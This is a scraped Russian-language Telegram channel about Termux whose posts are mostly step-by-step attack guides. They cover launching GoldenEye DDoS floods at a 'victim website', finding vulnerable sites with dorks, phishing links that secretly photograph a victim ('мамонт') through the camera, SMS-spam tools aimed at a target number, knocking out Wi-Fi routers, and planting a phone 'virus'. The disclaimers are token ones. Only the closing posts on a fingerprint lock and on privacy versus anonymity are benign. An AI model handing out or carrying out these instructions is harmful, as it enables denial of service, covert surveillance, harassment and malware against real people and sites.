Termux | RUS
93 subscribers
11 photos
25 links
Всё о Termux
— Кибербезопасность и уязвимости
— Приватность и анонимность
— Интернет и его темная сторона

Материал на данном канале присутствует только в целях осведомления пользователей и ни к чему не принуждает! Автор ответственности не несет !
Download Telegram
DDOS-атака с использованием GoldenEye в Kali Linux и Android

Не атакуйте правительственные сайты *

ШАГ 1
Откройте терминал в Kali Linux или Termux в Android
Введите следующую команду, чтобы создать и открыть новый каталог
mkdir ddos
cd ddos

ШАГ 2
Пропустите этот шаг, если вы используете Kali Linux
В Termux вам нужно сначала загрузить пакет python2 и git
pkg install python2
pkg install git

ШАГ 3
Клонировать исходный код GoldenEye с GitHub
Он загрузит весь исходный код на ваше устройство.
git clone https://github.com/jseidl/GoldenEye.git

ШАГ 4
Будет создан новый каталог, давайте откроем его.
Введите следующую команду, чтобы открыть его
cd GoldenEye /

ШАГ 5
Время провести DDOS-атаку на сайте жертвы
Введите следующую команду, чтобы выполнить DDOS с параметрами по умолчанию
# для Kali Linux
./goldeneye.py victim-website.com

ШАГ 6
Пропустите этот шаг, если вы используете Kali Linux
В Termux введите следующую команду, чтобы выполнить DDOS-атаку на веб-сайте жертвы
python2 ./goldeneye.py victim-website.com

ШАГ 7
Делай с аргументами
Добавьте значения для рабочих (-w), сокетов (-s) и метода (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

ШАГ 8.
Если вы не остановите атаку, в некоторых случаях сервер взорвется. Чтобы остановить атаку, просто нажмите CTRL + C.

ВЫВОД
Временное отключение веб-сайта. Проверьте, может ли сайт справиться с DDOS-атаками. Не пытайтесь закрыть Google, Facebook, Twitter и Medium, это не сработает.
Ищем уязвимые сайты с помощью Dorks-Eye в Termux

Эта программа написанная на python c помощью ее вы сможете легко найти google dorks (уязвимые сайты)

Прошу обратить внимание! Автор данной статьи не несёт ответственности за любые последствия вслед использования предоставленной информации. Все материалы опубликованы исключительно в образовательных целях!
источник статьи

Обновим пакеты:

apt update -y
apt upgrade -y
Качаем гит:

apt install git
python 3:

apt install python 3
Качаем репозитории с github:

git clone https://github.com/BullsEye0/dorks-eye.git

Запускаем!

cd dorks-eye
pip install -r requirements.txt
python dorks-eye.py
Как получить фотографию жертвы, перешедшей по ссылке. SayCheese - Termux

То, что сайты собирают о своих пользователях очень много данных всем известно. Но помимо этого, сайт может легко запросить доступ к камере устройства, и сделать вашу фотографию.

Утилита SayCheese работает по такому же принципу, если мамонт, которому вы кинули ссылку, перешёл по ней и дал разрешение на использование камеры, то его фотография окажется у вас на устройстве.

Установка:

pkg install php

pkg install openssh

git clone https://github.com/Anonymous3-SIT/saycheese

Использование:

cd SayCheese

bash SayCheese.sh

После выполнения данной команды, вам нужно будет выбрать сервер, настроить субдомен.

Если всё правильно, то всё пойдёт автоматически.

Открыть фотографию можно командой:

termux-open <название фото>
Получаем 500+ инструментов с помощью Termux Darkfly-Tool

DarkFly-Tool - это инструмент для установки инструментов. Этот инструмент облегчит вам задачу. Поэтому вам не нужно вводить git clone или искать репозиторий github. Вам нужно только выбрать номер. Какой инструмент вы хотите установить. Готово к установке 530 инструментов. и для тех из вас, кто любит повеселиться. Есть 7 инструментов для SMS-спама, которые готовы к использованию, вам просто нужно выбрать спам, чтобы использовать целевой номер. Есть токопедия Dll.

Установка:
pkg install python2
pkg install git
git clone https://github.com/Ranginang67/DarkFly-Tool
cd DarkFly-Tool
python2 install.py

Заметка
if python2 install.py
chmod +x install.py
python2 install.py

Как обновить:
Для обновления этого инструмента просто выполните переустановку, первый способ - установить инструменты Darkfly, при переустановке старый файл будет удален и заменен установленным новым.
Убиваем Wi-Fi через Termux

Данный способ можете протестировать на своем собственном Wi-Fi. Чтобы все работало нужно подключиться сначала к wi-fi сети, которую вы хотите ''положить''.

Инструкция:

Устанавливаем Termux и по очереди прописываем команды в консоль:

pkg upgrade
pkg install python python2 git
cd
git clone
https://github.com/artem-cell/wifi-dosser
cd wifi-dosser
pip2 install requests mechanize
ls
python2
wifi-ddoser.py
python2
wifi-ddoser.py (ваш ip адрес, пример 195.142.1.1) 80 9999

Если что, после портов в последний строчке - это время в секундах. Указывайте столько, сколько вам нужно, чтобы положить роутер.

Если тестируете на своем собственном роутере, то, чтобы остановить ddos, просто перезагрузите его.
Как создать собственный вирус для телефона с помощью Termux

Инструкция

1. Устанавливаем Termux (кликабельно)

2. Заходим в информацию о приложении Termux > Разрешение приложений > включаем пункт "память"

3. Прописываем команды в консоль:


apt update

apt upgrade

pkg install git

git clone https://github.com/Terror696/Vitus2.0

cd Vitus2.0

cp VirtualXposed.apk /sdcard/

После установки вирус появится в файлах вашего телефона.
Ставим отпечаток пальца на Termux

Инструкция

Обновим пакеты:

pkg update upgrade -y
Теперь нужен git:

pkg install git
Качаем инструмент:

git clone https://github.com/MrAlpha786/termux-fingerprint-lock
Открываем папек с инструментом:

cd termux-fingerprint-lock
Делаем главный файл исполняемым:

chmod u+x setup
И запускаем его:

bash setup
Попросят нажать на отпечаток, если что-то пошло не так, значит ваш телефон не поддерживает это.
Не путаем приватность и анонимность

Приватность.
Никто не видит, что ты делаешь или какие данные хранишь, но может знать, что они принадлежат тебе.

Если ты отправляешь другу сообщение через “секретный чат” телеграм, то оно зашифровано от пользователя до пользователя и никто другой его не увидит. Такое сообщение остается приватным.

Анонимность.
Подразумевает, что твои действия невозможно связать с тобой, но видно, что ты делаешь.

Например, хозяин сайта в tor знает, что кто-то посетил его сайт, но не может привязать к кому-то это посещение.

Или, если ты оставишь где-то пост или комментарий, авторство которого не определить, то он будет анонимным. Но далеко не приватным, а доступным публично.

Псевдонимность.
Случай анонимности, подразумевающий использование псевдонима.

Сейчас в сети большинство используют никнеймы. Таким образом множество сообщений и действий привязываются к конкретному никнейму, но не “реальной личности”